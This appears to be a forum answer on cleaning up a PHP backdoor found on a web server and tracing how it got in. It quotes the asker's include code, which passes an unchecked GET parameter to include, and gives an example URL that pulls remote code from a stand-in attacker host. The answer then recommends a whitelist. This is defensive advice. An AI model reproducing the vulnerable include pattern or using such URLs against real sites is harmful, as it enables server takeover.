rename the file immediately (to something other than .php) before further inspecting it, so any malicious user can't use it anymore.
Then investigate to how they were able to inject this on your server.
In your access logs you will find page-loads that load that specific PHP file. That will be your first clue. Investigate other connections from the same IP address for example and look at what scripts they have accessed/abused. Somewhere you will probably find you have an outdated/vulnerable wordpress plug-in, joomla plug-in, etc. Update or remove that plug-in ASAP, or you will be hacked again soon!
Also when checking your access logs, see if they have uploaded new backdoors! Maybe you see some scripts being called by the same IP address that should not exist. Delete/Rename them too!
What is code does is pretty simple, yet pretty advanced: It allows the holder of the password to execute any code you would be able to execute through PHP. The advanced bit is that it is difficult to detect. It uses no base64, no eval, etc.
edit:
idealizm said in the comments:
I'm actually not using Wordpress (or any other CMS) on this domain -- but I do have an index.php file which handles the dynamic creation of various pages by doing an include of an existing file prefixed with an underscore -- so index.php?go=about would include("about.php"). It checks if the file exists, and, if not, only includes the default file. I was hoping that this was secure enough. Is this where they might have exploited my code? ` if ($_GET['go']=='') { $go = 'videos'; } else { $go = $_GET['go']; } if (!(file_exists(''.$go.'.php'))) { $go = 'videos'; }
Yes, there can be your problem! You say the included file is prefixed with an underscore, but I don't see that in your code... So, if the hacker went to index.php?go=http://hackerssite.com/hackerscode
, you would end up including http://hackerssite.com/hackerscode.php
code, and allow for havoc!
Remove (and never allow) the code inclusion of direct user input. Check $_GET['go']
against an array of allowed include pages, or use a switch
to call the include
.